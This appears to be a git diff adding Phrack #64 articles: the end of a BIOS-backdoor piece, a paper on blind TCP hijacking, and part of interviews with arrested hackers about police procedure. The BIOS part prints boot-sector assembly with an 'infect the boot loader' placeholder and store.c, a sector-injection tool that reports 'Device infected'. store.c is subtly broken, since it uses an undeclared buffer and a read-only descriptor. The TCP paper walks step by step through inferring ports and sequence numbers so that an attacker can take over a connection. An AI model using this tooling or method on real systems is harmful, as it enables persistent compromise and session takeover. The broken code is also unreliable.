+	;; stack init
+	mov	ax, 0
+	mov	ss, ax
+	mov	ax, 0xffff
+	mov	sp, ax
+
+	;; move out of the zone so we can load the TRUE boot loader
+	mov	ax, 0x7c0
+	mov	ds, ax
+	mov	ax, 0x100
+	mov	es, ax
+	mov	si, 0
+	mov	di, 0
+	mov	cx, 0x200
+	cld
+	rep	movsb
+	
+	;; jump to our new location
+	jmp	0x100:next
+
+	
+next:				;; to jump to the new location
+	
+	;; load the true boot loader
+	mov	dl, [drive]
+	mov	ax, 0x07C0
+	mov	es, ax
+	mov	bx, 0
+	mov	ah, 2
+	mov	al, 1
+	mov	ch, 0
+	mov	cl, 1
+	mov	dh, 0
+	int	0x13
+
+	;; do your evil stuff there (ie : infect the boot loader)
+	nop
+	nop
+	nop	
+	
+	;; execute system
+	jmp 	07C0h:0
+
+	
+size    equ     $ - entry
+%if size+2 > 512
+	%error "code is too large for boot sector"
+%endif
+
+times   (512 - size - 2) db 0	; fill 512 bytes
+db      0x55, 0xAA		; boot signature
+
+---
+
+
+--[ store.c
+
+/*
+** code to be used to store a fake bootloader loaded by an infected BIOS
+**
+** usage is :
+**		store <device to store on> <sector number> <file to inject>
+**
+** compile with : gcc store.c -o store
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <fcntl.h>
+
+#define CODE_SIZE	512
+#define SECTOR_SIZE	512
+
+void	usage(char *cmd)
+{
+  fprintf(stderr, "usage is : %s <device> <sector> <code>", cmd);
+  exit(0);
+}
+
+
+int	main(int argc, char **argv)
+{
+  int	off;
+  int   i;
+  int   devfd;
+  int	codefd;
+  int   cnt; 
+  char  code[CODE_SIZE];
+  
+  if (argc != 4)
+    usage(argv[0]);
+  if ((devfd = open(argv[1], O_RDONLY)) == -1)
+    { 
+      fprintf(stderr, "error : could not open device\n");
+      exit(1);
+    } 
+  off = atoi(argv[2]);
+  if ((codefd = open(argv[3], O_RDONLY)) == -1)
+    { 
+      fprintf(stderr, "error : could not open code file\n");
+      exit(1);
+    } 
+  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
+    if ((i = read(codefd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 
+      { 
+	fprintf(stderr, "error reading code\n");
+	exit(1);
+      }
+  lseek(devfd, (off - 1) * SECTOR_SIZE, SEEK_SET);
+  for (cnt = 0; cnt != CODE_SIZE; cnt += i)
+    if ((i = write(devfd, &(mbr[cnt]), CODE_SIZE - cnt)) <= 0) 
+      { 
+	fprintf(stderr, "error reading code\n");
+	exit(1);
+      }
+  close(devfd);
+  close(codefd);
+  printf("Device infected\n");
+  return 0;				   
+}
+
+---
+
+
+	Okay, now that we can load our code using the BIOS, time has come
+to consider what we can do in this position. As we are nearly the first one
+to have control over the system, we can do really interesting things.
+
+	First, we can hijack BIOS interruptions and make them jump to
+our code. This is interesting because instead of writing all the code in
+the BIOS, we can now hijack BIOS routines having as much space as we need
+and without having to do a lot of reverse engineering.
+
+	Next, we can easily patch the boot loader on-thy-fly as it is our
+own code which loads it. In fact, we don't even have to call the true
+boot loader if we don't want to, we can make a fake one that loads a nicely
+patched kernel based on the real one. Or you can make a fake boot loader
+(or even patch the real one on-the-fly) that loads the real kernel and
+patch it on the fly. The choice is up to you.
+
+        Finally, I would talk about one last thing that came on my mind.
+Combined with IDTR hijacking, patching the BIOS can assure us a complete
+control of the system. We can patch the BIOS so that it loads our own boot
+loader. This boot loader is a special one, in fact it loads a mini-OS of
+our own which sets an IDT. Then, as we hijacked the IDTR register (there
+are several ways to do it, the easiest being patching the target OS boot
+process in order to prevent him to erase our IDT), we can then load the
+true boot loader which will load the true kernel. At this time, our own os
+will hijack the entire system with its own IDT proxying any interrupt you
+want to, hijacking any event on the system. We even can use the system
+clock as a scheduler forthe two OS : the tick will be caught by our own 
+OS and depending the configuration (we can say for example 10% of the time 
+for our OS and 90% for the real OS), we can execute our code or give the 
+control to the real OS by jumping on its IDT.
+
+	 You can do lot of things simply by patching the BIOS, so I suggest
+you to implement your own ideas. Remember this is not so difficult,
+documentation about this subject already exists and we can really do lots
+of things. Just remember to use Bochs for tests before going in the wild,
+it certainly isn't fun when smoke comes out of one of the motherboard's
+chips...
+
+
+
+5.  Conclusion
+
+
+     So that's it, hardware can be backdoored quite easily. Of course,
+what I demonstrated here was just a fast overview. We can do LOTS of things
+with hardware, things that can assure us a total control of the computer
+we're on and remain stealth. There is a huge work to do in this area as
+more and more devices become CPU independent and implement many features
+that can be used to do funny things. Imagination (and portability, sic...)
+are the only limits.
+
+   For people very interested in having fun in the hardware world, I
+suggest to take a look at CPU microcode programming system
+(start with the AMD K8 reverse engineering, see [18]), network cards
+BIOSes and the PXE system.
+
+(And hardware hacking can be a fun start to learn to fuck the TCPA system).
+
+
+
+6.  References
+
+
+[1] : The Art of Assembly Programming - Randall Hyde
+(http://webster.cs.ucr.edu/AoA/index.html)
+
+[2] : Linux Device Drivers - Alessandro Rubini, Jonathan Corbet
+(http://www.xml.com/ldd/chapter/book/)
+
+[3] : OpenGL
+(http://www.opengl.org/)
+
+[4] : Neon Helium Productions (NeHe)
+(http://nehe.gamedev.net/)
+
+[5] : GPGPU
+(http://www.gpgpu.org)
+
+[6] : HLSL tutorial
+(http://msdn2.microsoft.com/en-us/library/bb173494.aspx)
+
+[7] : GLSL tutorial
+(http://nehe.gamedev.net/data/articles/article.asp?article=21)
+
+[8] : The NVIDIA Cg Toolkit
+(http://developer.nvidia.com/object/cg_toolkit.html)
+
+[9] : NVIDIA Cg tutorial
+(http://developer.nvidia.com/object/cg_tutorial_home.html)
+
+[10] : nVIDIA CUDA (Compute Unified Device Architecture)
+(http://developer.nvidia.com/object/cuda.html)
+
+[11] : Implementing and Detecting an ACPI BIOS RootKit - John Heasman
+(http://www.ngssoftware.com/jh_bhf2006.pdf)
+
+[12] : /dev/bios - Stefan Reinauer
+(http://www.openbios.info/development/devbios.html)
+
+[13] : OpenBIOS initiative
+(http://www.openbios.info/)
+
+[14] : Award BIOS reverse engineering guide - Pinczakko
+(http://www.geocities.com/mamanzip/Articles/Award_Bios_RE)
+
+[15] : Wim's BIOS
+(http://www.wimsbios.com/)
+
+[16] : Bochs IA-32 Emulator Project
+(http://bochs.sourceforge.net/)
+
+[17] : Bochs BIOS source code
+(http://bochs.sourceforge.net/cgi-bin/lxr/source/bios/rombios.c)
+
+[18] : Opteron Exposed: Reverse Engineering AMD K8 Microcode Updates
+(http://www.packetstormsecurity.nl/0407-exploits/OpteronMicrocode.txt)
+
+
+
+7.  Thanks
+
+     
+     Without these people, this file wouldn't be, so thanks to them :
+
+	* Auquen, for introducing me the idea of playing with hardware five
+	years ago
+
+	* Kad and Mayhem, for convincing me to write this article
+
+	* Sauron, for always motivating me (nothing sexual)
+
+	* Glenux, for pointing out CUDA
+
+	* All people present to scythale's aperos, for helping me to get
+	high in such ways I can come up with evil thinking (yeah, I was
+	drunk when I decided to backdoor my hardware)
+
+
+-- 
+scythale@gmail.com
diff --git a/phrack64/13.txt b/phrack64/13.txt
new file mode 100644
index 0000000..765eda5
--- /dev/null
+++ b/phrack64/13.txt
@@ -0,0 +1,452 @@
+           _                                                  _
+          _/B\_                                              _/W\_
+          (* *)              Phrack #64 file 13              (* *)
+          | - |                                              | - |
+          |   |      Blind TCP/IP hijacking is still alive   |   |
+          |   |                                              |   |
+          |   |            By lkm <lkm@phrack.org>           |   |
+          |   |                                              |   |
+          |   |                                              |   |
+          (______________________________________________________)
+
+
+
+--[ Contents
+
+        1 - Introduction
+        2 - Prerequisites
+          2.1 - A brief reminder on TCP
+          2.2 - The interest of IP ID
+          2.3 - List of informations to gather
+
+        3 - Attack description
+          3.1 - Finding the client-port
+          3.2 - Finding the server's SND.NEXT
+          3.3 - Finding the client's SND.NEXT
+
+        4 - Discussion
+          4.1 - Vulnerable systems
+          4.2 - Limitations
+
+        5 - Conclusion
+
+        6 - References
+
+
+--[ 1 - Introduction
+
+Fun with TCP (blind spoofing/hijacking, etc...) was very popular several
+years ago when the initials TCP sequence numbers (ISN) were guessable (64K rule, 
+etc...). Now that the ISNs are fairly well randomized, this stuff seems to be
+impossible. 
+
+In this paper we will show that it is still possible to perform blind TCP
+hijacking nowadays (without attacking the PRNG responsible for generating 
+the ISNs, like in [1]). We will present a method which works against a number 
+of systems (Windows 2K, windows XP, and FreeBSD 4). This method is not really 
+straightforward to implement, but is nonetheless entirely feasible, as we've
+coded a tool which was successfully used to perform this attack against all
+the vulnerable systems.
+
+
+--[ 2 - Prerequisites
+
+In this section we will give some informations that are necessary to
+understand this paper.
+
+----[ 2.1 - A brief reminder on TCP 
+
+A TCP connection between two hosts (which will be called respectively
+"client" and "server" in the rest of the paper) can be identified by a tuple
+[client-IP, server-IP, client-port, server-port]. While the server port is
+well known, the client port is usually in the range 1024-5000, and
+automatically assigned by the operating system. (Exemple: the connection
+from some guy to freenode may be represented by [ppp289.someISP.com,
+irc.freenode.net, 1207, 6667]). 
+
+When communication occurs on a TCP connexion, the exchanged TCP packet
+headers are containing these informations (actually, the IP header contains
+the source/destination IP, and the TCP header contains the
+source/destination port). Each TCP packet header also contains fields for a
+sequence number (SEQ), and an acknowledgement number (ACK). 
+
+Each of the two hosts involved in the connection computes a 32bits SEQ
+number randomly at the establishment of the connection. This initial SEQ
+number is called the ISN. Then, each time an host sends some packet with 
+N bytes of data, it adds N to the SEQ number.
+The sender put his current SEQ in the SEQ field of each outgoing TCP packet.
+The ACK field is filled with the next *expected* SEQ number from the other
+host. Each host will maintain his own next sequence number (called
+SND.NEXT), and next expected SEQ number from the other host (called
+RCV.NEXT).
+
+Let's clarify with an exemple (for the sake of simplicity, we consider that
+the connection is already established, and the ports are not shown.) 
+
+
+[===============================================================================]
+Client						Server
+
+[SND.NEXT=1000]					[SND.NEXT=2000]
+	  --[SEQ=1000, ACK=2000, size=20]->
+[SND.NEXT=1020]					[SND.NEXT=2000]
+	  <-[SEQ=2000, ACK=1020, size=50]--
+[SND.NEXT=1020]					[SND.NEXT=2050]	
+	  --[SEQ=1020, ACK=2050, size=0]->
+[===============================================================================]
+
+In the above example, first the client sends 20 bytes of data. Then, the
+server acknowledges this data (ACK=1020), and send its own 50 bytes of data
+in the same packet. The last packet sent by the client is what we will call
+a "simple ACK". It acknowledges the 50-bytes data sent by the server, but
+carry no data payload. The "simple ACK" is used, among other cases, where a
+host acknowledge received data, but has no data to transmit yet. Obviously,
+any well-formed "simple ACK" packet will not be acknowledged, as this would
+lead to an infinite loop. Conceptually, each byte has a sequence number,
+it's just that the SEQ contained in the TCP header field represents the
+sequence number of the first byte. For example, the 20 bytes of the first
+packet have sequence numbers  1000..1019.
+
+TCP implements a flow control mechanism by defining the concept of "window".
+Each host has a TCP window size (which is dynamic, specific to each TCP
+connection, and announced in TCP packets), that we will call RCV.WND.
+
+At any given time, a host will accept bytes with sequence number
+between RCV.NXT and (RCV.NXT+RCV.WND-1). This mechanism ensures that at any
+tyme, there can be no more than RCV.WND bytes "in transit" to the host.
+
+The establishment and teardown of the connection is managed by flags in the
+TCP header. The only useful flags in this paper are SYN, ACK, and RST (for
+more information, see RFC793 [2]). The SYN and ACK flags are used in the
+connection establishment, as follows: 
+
+[===============================================================================]
+Client						Server
+
+[client picks an ISN]				
+[SND.NEXT=5000]
+	--[flags=SYN, SEQ=5000]-->		[server picks an ISN]
+[SND.NEXT=5001]					[SND.NEXT=9000]
+	<-[flags=SYN+ACK, SEQ=9000, ACK=5001]--
+[SND.NEXT=5001]					[SND.NEXT=9001]
+	--[flags=ACK, SEQ=5001, ACK=9001]-->
+...connection established... 
+[===============================================================================]
+
+You'll remark that during the establishment, the SND.NEXT of each hosts is
+incremented by 1. That's because the SYN flag counts as one (virtual) byte,
+as far as the sequence number is concerned.  Thus, any packet with the SYN
+flag set will increment the SND.NEXT by 1+packet_data_size (here, the data size
+is 0). You'll also note that the ACK field is optional. The ACK field is not
+to be confused with the ACK flag, even if they are related: The ACK flag is
+set if the ACK field exists. The ACK flag is always set on packets beloning
+to an established connection.
+
+The RST flag is used to close a connection abnormally (due to an error, for
+example a connection attempt to a closed port). 
+
+
+---- [ 2.2 - The interest of the IP ID
+
+The IP header contains a flag named IP_ID, which is a 16-bits integer used by
+the IP fragmentation/reassembly mechanism. This number needs to be unique
+for each IP packet sent by an host, but will be unchanged by fragmentation
+(thus, fragments of the same packet will have the same IP ID). 
+
+Now, you must be wondering why the IP_ID is so interesting? Well, there's a
+nifty "feature" in some TCP/IP stacks (including Windows 98, 2K, and XP) :
+these stacks store the IP_ID in a global counter, which is simply incremeted
+with each IP packet sent. This enables an attacker to probe the IP_ID
+counter of an host (with a ping, for exemple), and so, know when the host is
+sending packets.  
+
+Exemple:
+
+[===============================================================================]
+attacker					Host
+	 	--[PING]->
+	<-[PING REPLY, IP_ID=1000]--
+
+... wait a little ...
+
+	 	--[PING]->
+	<-[PING REPLY, IP_ID=1010]--
+
+<attacker> Uh oh, the Host sent 9 IP packets between my pings. 
+[===============================================================================]
+
+This technique is well known, and has already been exploited to perform
+really stealth portscans ([3] and [5]).
+
+
+----[ 2.3 - List of informations to gather
+
+Well, now, what we need to hijack an existing TCP connection? 
+
+First, we need to know the client IP, server IP, client port, and server
+port. 
+In this paper we'll assume that the client IP, server IP, and server port
+are known. The difficulty resides in detecting the client port, since it is
+randomly assigned by the client's OS. We will see in the following section
+how to do that, with the IP_ID. 
+
+The next thing we need if we want to be able to hijack both ways (send data
+to client from the server, and send data from server to client) is to know
+the sequence number of the server, and the client. 
+
+Obviously, the most interesting is the client sequence number, because it
+enables us to send data to the server that appears to have been sent by the
+client. But, as the rest of the paper will show, we'll need to detect the
+server's sequence number first, because we will need it to detect the
+client's sequence number. 
+
+
+
+--[ 3 - Attack description
+
+
+In this section, we will show how to determine the client's port, then the
+server's sequence number, and finally the client's sequence number. We will
+consider that the client's OS is a vulnerable OS. The server can run on any
+OS. 
+
+
+----[ 3.1 - Finding the client-port
+
+Assuming we already know the client/server IP, and the server port, there's
+a well known method to test if a given port is the correct client port. 
+In order to do this, we can send a TCP packet with the SYN flag set to
+server-IP:server-port, from client-IP:guessed-client-port (we need to be
+able to send spoofed IP packets for this technique to work). 
+
+
+ 	Here's what will happen when we send our packet if the guessed-client-port
+is NOT the correct client port: 
+
+[===============================================================================]
+Attacker (masquerading as client)			Server
+
+			--[flags=SYN, SEQ=1000]->
+
+Real client						
+
+		<-[flags=SYN+ACK, SEQ=2000, ACK=1001]--
+
+... the real client didn't start this connection, so it aborts with RST ... 
+
+		--[flags=RST]->
+[===============================================================================]
+
+
+Here's what will happen when we send our packet if the guessed-client-port
+IS the correct client port: 
+
+[===============================================================================]
+Attacker (masquerading as client)			Server
+
+			--[flags=SYN, SEQ=1000]->
+
+Real client						
+
+... upon reception of our SYN, the server replies by a simple ACK ...
+
+		<-[flags=ACK, SEQ=xxxx, ACK=yyyy]--
+
+... the client sends nothing in reply of a simple ACK ... 
+[===============================================================================]
+
+
+Now, what's important in all this, is that in the first case the client
+sends a packet, and in the second case it doesn't. If you have carefully
+read the section 2.2, you know this particular thing can be detected by
+probing the IP ID counter of the client.
+
+So, all we have to do to test if a guessed client-port is the correct one
+is: 
+
+- Send a PING to the client, note the IP ID 
+- Send our spoofed SYN packet
+- Resend a PING to the client, note the new IP ID
+- Compare the two IP IDs to determine if the guessed port was correct.
+
+Obviously, if one want to make an efficient scanner, there's many
+difficulties, notably the fact that the client may transmit packets on his
+own between our two PINGs, and the latency between the client and the server
+(which affects the delay after which the client will send his RST packet in
+case of an incorrect guess). Coding an efficient client-port scanner is left as 
+an exercise to the reader :). With our tool - which measures the latency
+before the attack and tries to adapt itself to the client's traffic in 
+real-time - the client-port is usually found in less than 3 minutes. 
+
+
+----[ 3.2 - Finding the server's SND.NEXT
+
+Now that we (hopefully :)) have the client port, we need to know the
+server's SND.NEXT (in other words, his current sequence number).
+
+
+Whenever a host receive a TCP packet with the good source/destination ports,
+but an incorrect seq and/or ack, it sends back a simple ACK with the correct
+SEQ/ACK numbers. Before we investigate this matter, let's define exactly what 
+is a correct seq/ack combination, as defined by the RFC793 [2]:
+
+A correct SEQ is a SEQ which is between the RCV.NEXT and (RCV.NEXT+RCV.WND-1)
+of the host receiving the packet. Typically, the RCV.WND is a fairly large 
+number (several dozens of kilobytes at last). 
+
+A correct ACK is an ACK which corresponds to a sequence number of something
+the host receiving the ACK has already sent. That is, the ACK field of the
+packet received by an host must be lower or equal than the host's own
+current SND.SEQ, otherwise the ACK is invalid (you can't acknowledge data that
+were never sent!). 
+
+It is important to node that the sequence number space is "circular". 
+For exemple, the condition used by the receiving host to check the ACK validity
+is not simply the unsigned comparison "ACK <= receiver's SND.NEXT",
+but the signed comparison "(ACK - receiver's SND.NEXT) <= 0".
+
+Now, let's return to our original problem: we want to guess server's
+SND.NEXT. We know that if we send a wrong SEQ or ACK to the client from the
+server, the client will send back an ACK, while if we guess right, the
+client will send nothing. As for the client-port detection, this may be
+tested with the IP ID. 
+
+If we look at the ACK checking formula, we note that if we pick
+randomly two ACK values, let's call them ack1 and ack2, such as 
+|ack1-ack2| = 2^31, then exactly one of them will be valid. For example, let
+ack1=0 and ack2=2^31. If the real ACK is between 1 and 2^31 then the ack2
+will be an acceptable ack. If the real ACK is 0, or is between (2^32 - 1) 
+and (2^31 + 1), then, the ack1 will be acceptable. 
+
+Taking this into consideration, we can more easily scan the sequence number
+space to find the server's SND.NEXT. Each guess will involve the sending of
+two packets, each with its SEQ field set to the guessed server's SND.NEXT. The
+first packet (resp. second packet) will have his ACK field set to ack1
+(resp. ack2), so that we are sure that if the guessed's SND.NEXT is correct, at
+least one of the two packet will be accepted.
+
+The sequence number space is way bigger than the client-port space, but two
+facts make this scan easier:
+
+First, when the client receive our packet, it replies immediately. There's
+not a problem with latency between client and server like in the client-port
+scan. Thus, the time between the two IP ID probes can be very small,
+speeding up our scanning and  reducing greatly the odds that the client will 
+have IP traffic between our probes and mess with our detection.
+
+Secondly, it's not necessary to test all the possible sequence numbers,
+because of the receiver's window. In fact, we need only to do approx.
+(2^32 / client's RCV.WND) guesses at worst (this fact has already been
+mentionned in [6]). Of course, we don't know the client's RCV.WND. 
+We can take a wild guess of RCV.WND=64K, perform the
+scan (trying each SEQ multiple of 64K). Then, if we didn't find anything,
+wen can try all SEQs such as seq = 32K + i*64K for all i. Then, all SEQ such
+as seq=16k + i*32k, and so on... narrowing the window, while avoiding to
+re-test already tried SEQs. On a typical "modern" connection, this scan
+usually takes less than 15 minutes with our tool. 
+
+With the server's SND.NEXT known, and a method to work around our ignorance
+of the ACK, we may hijack the connection in the way "server -> client". This
+is not bad, but not terribly useful, we'd prefer to be able to send data
+from the client to the server, to make the client execute a command, etc...
+In order to do this, we need to find the client's SND.NEXT.
+
+----[ 3.3 - Finding the client's SND.NEXT
+
+What we can do to find the client's SND.NEXT ? Obviously we can't use the
+same method as for the server's SND.NEXT, because the server's OS is
+probably not vunerable to this attack, and besides, the heavy network
+traffic on the server would render the IP ID analysis infeasible. 
+
+However, we know the server's SND.NEXT. We also know that the client's
+SND.NEXT is used for checking the ACK fields of client's incoming packets.
+So we can send packets from the server to the client with SEQ field set to 
+server's SND.NEXT, pick an ACK, and determine (again with IP ID) if our ACK 
+was acceptable.
+
+If we detect that our ACK was acceptable, that means that 
+(guessed_ACK - SND.NEXT) <= 0. Otherwise, it means.. well, you guessed it,
+that (guessed_ACK - SND_NEXT) > 0. 
+
+Using this knowledge, we can find the exact SND_NEXT in at most 32 tries
+by doing a binary search (a slightly modified one, because the sequence
+space is circular).
+
+Now, at last we have all the required informations and we can perform the
+session hijacking from either client or server.
+
+--[ 4 - Discussion
+
+In this section we'll attempt to identify the affected systems, discuss
+limitations of this attacks, present similar attacks against older systems.   
+
+----[ 4.1 - Vulnerable systems
+
+This attack has been tested on Windows 2K, Windows XP <= SP2, and FreeBSD 4.
+It should be noted that FreeBSD has a kernel option to randomize the IP ID,
+which makes this attack impossible. As far as we know, there's no fix for
+Windows 2K and XP. 
+
+The only "bug" which makes this attack possible on the vulnerable systems is
+the non-randomized IP ID. The other behaviors (ACK checking that enables us
+to do a binary search, etc...) are expected by the RFC793 [2] (however, there's
+been work to improve these problems in [4]).
+
+It's interesting to see that, as far as we could test, only Windows 2K,
+Windows XP, and FreeBSD 4 were vulnerable. There's other OS which use the
+same IP ID incrementation system, but they don't use the same ACK checking
+mechanism. Hmm.. this similarity between Windows's and FreeBSD's TCP/IP
+stack behavior is troubling... :) MacOS X is based on FreeBSD but is not 
+vulnerable because it uses a different IP ID numbering scheme. Windows Vista
+wasn't tested. 
+
+
+----[ 4.2 - Limitations
+
+The described attack has various limitations:
+
+First, the attack doesn't work "as is" on Windows 98. That's not really a
+limitation, because the initial SEQ of Windows 98 is equal to the uptime of
+the machine in milliseconds, modulo 2^32. We won't discuss how to do
+hijacking with Windows 98 because it's a trivial joke :) 
+
+Secondly, the attack will be difficult if the client has a slow connection,
+or has a lot of traffic (messing with the IP ID analysis). Also, there's the
+problem of the latency between the client and the server. These problems can
+be mitigated by writing an intelligent tool which measures the latency,
+detects when the host has traffic, etc... 
+
+Furthermore, we need access to the client host. We need to be able to send
+packets and receive replies to get the IP ID. Any type of packet will do, ICMP
+or TCP or whatever. The attack will not be possible if the host is behind a
+firewall/NAT/... which blocks absolutely all type of packets, but 1
+unfiltered port (even closed on the client) suffices to make the attack
+possible. This problem is present against Windows XP SP2 and later, which
+comes with an integrated firewall. Windows XP SP2 is vulnerable, but the
+firewall may prevent the attack in some situations. 
+
+
+--[ 5 - Conclusion
+
+In this paper we have presented a method of blind TCP hijacking which works
+on Windows 2K/XP, and FreeBSD 4. While this method has a number of
+limitations, it's perfectly feasible and works against a large number of
+hosts. Furthermore, a large number of protocols over TCP still use
+unencrypted communication, so the impact on security of the blind TCP
+hijacking is not negligible. 
+
+
+--[ 6 - References
+
+[1] http://lcamtuf.coredump.cx/newtcp/
+
+[2] http://www.ietf.org/rfc/rfc793.txt
+
+[3] http://insecure.org/nmap/idlescan.html
+
+[4] http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-07.txt
+
+[5] http://seclists.org/bugtraq/1998/Dec/0079.html
+
+[6] http://osvdb.org/reference/SlippingInTheWindow_v1.0.doc
+
diff --git a/phrack64/14.txt b/phrack64/14.txt
new file mode 100644
index 0000000..4c990c8
--- /dev/null
+++ b/phrack64/14.txt
@@ -0,0 +1,1028 @@
+            _                                                  _
+          _/B\_                                              _/W\_
+          (* *)              Phrack #64 file 10              (* *)
+          | - |                                              | - |
+          |   |       Know your enemy : facing the cops      |   |
+          |   |                                              |   |
+          |   |                    By Lance                  |   |
+          |   |                                              |   |
+          |   |                                              |   |
+          (______________________________________________________)
+
+
+
+
+
+The following article is divided into three parts. The first and
+second part are interviews done by The Circle of lost Hackers. The
+people interviewed are busted hackers. You can learn, through their
+experiences, how cops are working in each of their country. The last
+part of this article is a description about how a Computer Crime Unit
+proceeds to bust hackers. We know that this article will probably help
+more policemen than hackers but if hackers know how the cops proceed
+thay can counter them. That's the goal of this article.
+
+Have a nice read.
+
+(Hi Lance! :)
+
+
+                      ------------------------------------------
+
+                                    Willy's interview
+
+
+
+<THE CIRCLE OF LOST HACKERS> Hi WILLY, can you tell us who are you,
+what's your nationality, and what's your daily job ?
+
+hi. i'm from germany. i actually finished law school.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell us what kind of
+relationship you're having with the police in your country ? In some other
+European country, the law is hardening these days, what about germany ?
+
+Well, due to the nature of my finished studies, I can view the laws
+from a professional point. The laws about computer crime did not change
+since years. so you cant see they are getting harder. What we can say is,
+that due to 9/11/01, some privacy laws got stricter .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Can you explain us what kind of
+privacy laws got stricter ?
+
+Yeah. for example all universities have to point students that are
+muslims, between 20/30, not married, etc. so police can do a screen
+search.  Some german courts said this is illegal, some said not. the
+process is on-going, but the screen searches didnt have much results
+yet. On the other hand, we have pretty active privacy-protection people
+("datenschutzbeauftragte") which are trying to get privacy a fundamental
+right written in the constitution. So, the process is like we have
+certain people who want a stricter privacy law, e.g. observation due to
+video-cameras on public places. (which does happen already somewhere).
+But, again, we have active people in the cuntry who work against these
+kind of observation methods. its not really decided if the supervision
+is getting stronger. What is getting stronger are all these DNA-tests now
+for certain kind of crimes, but its still not the way that any convicted
+person is in a DNA database - luckly.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Do you have the feeling that
+Computer related law is stricter since 09/11/01 ?
+
+Definitly not.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Are these non-computer related
+enforcements happened since the schroeder re-election ?
+
+Nope. these enforcements ("sicherheitspaket") happened after 9/11. the
+re-election of schroeder had nothing to do with enforcements. On
+one hand, ISP's have to keep the logfiles of dial-in IP's for 90
+days. but federal ministry of economics and technology is supporting
+a project called "JAP" (java annonymous proxy) to realize anonymous
+unobservable communication.  I dont know in details, but I'm pretty
+sure the realisation of JAP is not ok with the actualy laws in germany,
+because you can surf really completely anonymously with JAP. this is not
+corresponding with the law to keep the logfiles. i dont know. from my
+point of view, eventhough i (of course) like JAP, it is not compatible
+with current german law. but its support by a federal ministry. thats
+pretty strange i think. well, we'll see. You can get information about
+this on http://anon.inf.tu-dresden.de/index_en.html .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: now that we know a bit more about
+the context, can you explain us how you get into hacking, and since when
+you are involved in the scene ?
+
+Well, how did i get contact to the scene? i guess it was a way pretty
+much people started. i wanted to have the newest games. so I talked to
+some older guys at my school, and they told me to get a modem and call
+some BBS.  This was i guess 1991. you need to know that my hometown
+Berlin was pretty active with BBS, due to a political reason : local
+calls did only cost 23pf.  That was a special thing in west-berlin /
+cold-war. I cant remember when it was abolished. but, so there amyn many
+BBS in berlin due to the low costs.  Then, short time after, i got in
+contact with guys who always got the newest stuff from USA/UK into the
+BBS, and i though. "wham, that must be expensive" - it didnt take a long
+time untill i found out that there are ways to get around this. Also,
+I had a local mentor who introduced me to blueboxing and all the neat
+stuff around PBX, VMBS and stuff.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: when did you start to play with
+TCP/IP network ?
+
+I think that was pretty late. i heard that some of my oversea friends
+had a new way of chatting. no chat on BBS anymore, but on IRC. I guess
+this was in 1994. So, i got some informations, some accounts on a local
+university, and i only used "the net" for irc'ing.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: When (and why) did you get into
+troubles for the first time,
+
+Luckly, i only got into trouble once in 1997. I got a visit from four
+policemen (with weapons), who had a search warrent and did search my
+house. I was accused for espionage of data. thats how they call hacking
+here. They took all my equipment and stuff and it took a long time untill
+i heard of them again for a  questionning . I was at the police several
+times. first time, I think after  6 month, was due to a meeting with the
+attorny at state and the policemen.  This was just a meeting to see if
+they can use my computer stuff as prove. It was like they switched the
+computer on, the policemen said to the attorney "this could be a log file"
+and the attorny said "ok this might be a prove".  this went for all cd's
+and at least 20 papers with notes. ("this could be an IP adress". "this
+could be a l/p, etc . Of course, the attorney didnt have much knowledge,
+and i lost my notes with phone numbers on it ("yeah, but it could be
+an IP") . However, this was just a mandatory meeting because I denied
+anything and didnt allow them to use any of the stuff, so there has to
+be a judge or an attorney to see if the police took things that can be a
+prove at all. The second time I met them was for the crimes in question. I
+was there for a questioning (more than 2 years after the raid, and almost
+3 years after the actualy date where i should have done the crime) .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: How long did you stay at the
+police station just after your first perquisition ?
+
+First time, that was only 15 minutes. It was really only to see if the
+police took the correct stuff. e.g. if they had taken a book, I would
+have to get it back. because a book cant have anything to do with my
+accused crime. (except i had written IP numbers in that book, hehe)
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: what about the crime itself ? Did
+you earn money or make people effectively loose money by hacking ?
+
+No, i didnt earn any money. it was just for fun, to learn, and to see
+how far you can push a border. see what is possible, whats not. People
+didnt loose any money, too.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: How did they find you ?
+
+I still dont really know how they found me. the accused crime was (just)
+the unauthorized usage of dial-in accounts at one university. Unluckly,
+it was the starting point of my activities, so was a bit scared at
+first. You have to dial-in somwhere, if if that facility buists you,
+it could have been pretty bad. At the end, after the real questioning
+and after i got my fine, they had to drop ALL accuses of hacking and i
+was only guilty for having 9 warez cd's)
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: were you dialing from your home ?
+
+Yeah from my home. but i didnt use ISDN or had a caller ID on my analoge
+line, and it is not ok to tap a phone line for such a low-profile crime
+like hacking here in germany . So, since all hacking accuses got dropped,
+I didnt see what evidence they had, or how they get me at all.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Can you tell more about the
+policemen ? WHat kind of organisation did bust you ?
+
+It was a special department for computer crime organzied from the state
+police, the "landeskriminalamt" LKA. They didnt know much about computers
+at all i think. They didnt find all logfiles I had on my computer, they
+didnt find my JAZ disks with passwd files, they didnt find passwd files
+on my comp., etc .
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: Where did they bring u after
+beeing busted at the raid, and the second time for the interview ?
+
+After the raid, I could stay at home ! For the interview, I went the
+headquater of the LKA, into the rooms of the computer crime unit. simple
+room with one window, a table & chair, and a computer where the policemen
+himself did type what he asked, and what i answered.
+
+--
+
+<THE CIRCLE OF LOST HACKERS> QUESTION: have you heard interresting
+conversation between cops when you were in there ?
+
+hehe nope. not at all. and, of course, the door to the
+questioning room was closed when i was questioned. so i couldnt
+hear anything else . I have been interviewed by only one guy from
+"polizeihauptkommisar", no military grade, only a captain like explained
+in http://police-badges.de/online/sammeln/us-polizei.html .
+
